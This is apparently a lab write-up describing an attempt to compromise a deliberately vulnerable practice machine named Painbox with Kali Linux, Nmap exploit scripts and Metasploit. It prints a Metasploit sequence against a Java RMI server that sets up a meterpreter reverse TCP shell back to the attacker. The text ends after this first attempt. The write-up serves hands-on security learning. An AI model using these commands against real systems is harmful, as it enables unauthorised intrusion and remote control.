June 28, 2024

The objective of this project was to break into a vulnerable system, cleverly named Painbox, and deploy a payload using the Caldera framework. The goal was to gain unauthorized access and create a file on the target system. Here's a detailed account of the journey, the challenges faced, and the lessons learned.

Setting the Stage

Target System Overview

Preparation

To kick things off, I set up a Kali Linux virtual machine and installed Caldera, following the documentation to the letter. With everything in place, it was time to dive into the action.

Exploitation Attempts

Initial Reconnaissance: Nmap Scan

Before attempting any exploits, I conducted an Nmap scan to identify exploitable ports and services on Painbox:

nmap -Pn --script exploit [target_ip]

This scan provided a detailed overview of the system’s open ports and services, helping to identify which Metasploit modules could be used for exploitation.

First Try: Java RMI Server

The initial exploit targeted the Java RMI Server. Here’s the command sequence:

msfconsole
use exploit/multi/misc/java_rmi_server
set RHOSTS [target_ip_address]
set LHOST [your_local_ip_address]
set PAYLOAD java/meterpreter/reverse_tcp
set LPORT 4444
exploit